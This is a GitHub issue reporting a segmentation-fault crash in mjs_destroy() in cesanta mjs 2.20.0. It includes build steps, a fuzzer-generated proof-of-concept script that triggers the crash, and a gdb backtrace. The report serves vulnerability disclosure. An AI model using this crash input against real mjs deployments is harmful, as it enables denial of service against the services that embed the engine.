cesanta/mjs

SegFaultOnPc in mjs_destroy() at mjs.c:7563

vorfreuder opened this issue · 0 comments

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file.

Vulnerability Type
Segmentation fault on program counter

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl
poc (contents of the file `poc`; the input is fuzzer-generated and is shown verbatim, including the syntactically invalid fragments)
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

gdb info

Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563      mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1  0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n  a let z = JSON.parse('\"\"');  // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, "    true,"..., generate_jsc=0, res=0x7ffd20341a58)
    at mjs.c:9044
#2  0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    res=0x7ffd20341aa0) at mjs.c:9067
#3  0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558      mbuf_free(&mjs->owned_strings);
7559      mbuf_free(&mjs->foreign_strings);
7560      mbuf_free(&mjs->owned_values);
7561      mbuf_free(&mjs->scopes);
7562      mbuf_free(&mjs->loop_addresses);
7563      mbuf_free(&mjs->json_visited_stack);
7564      free(mjs->error_msg);
7565      free(mjs->stack_trace);
7566      mjs_ffi_args_free_list(mjs);
7567      gc_arena_destroy(mjs, &mjs->object_arena);